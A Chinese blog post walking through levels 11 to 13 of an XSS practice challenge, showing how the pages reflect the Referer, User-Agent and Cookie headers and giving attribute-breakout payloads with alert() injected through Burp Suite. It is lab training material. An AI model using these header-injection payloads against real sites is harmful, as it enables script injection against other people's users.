xss挑战之旅11关到13关,操作步骤配截图。

本文探讨了HTTP头部的Referer和User-Agent字段以及Cookie中的XSS注入问题。通过使用Burp Suite工具,展示了如何构造payload来触发XSS攻击,并介绍了level11到level13的防护策略。重点关注了HTTP头部的Referer和User-Agent字段以及Cookie在安全中的角色。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

level11

分析代码,相比上一关,多了一个str11=$_SERVER['HTTP_REFERER'];验证的是http头部的xss注入,使用burp抓包,修改相应的字段,构造http头部referer的payload。

 

头部本身没有Referer,自行添加了

 

payload:Referer:" onmouseover=alert(11) type="text"

      Referer:" onclick="alert(11)" type="text

level12

查看代码,str11=_SERVER['HTTP_USER_AGENT'];应该是User-Agent的http头部注入,burp抓包,构造头部User-Agent的payload。

 

payload:

User-Agent:" onmouseover=alert(12) type="text"

User-Agent:" onclick="alert(12)" type="text

 

 

level13

查看代码,这次是cookie类型的xss注入,setcookie("user", "call me maybe?", time()+3600);

 

构造payload:

Cookie:" onmouseover=alert(13) type="text"

Cookie:" onclick="alert(13)" type="text

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值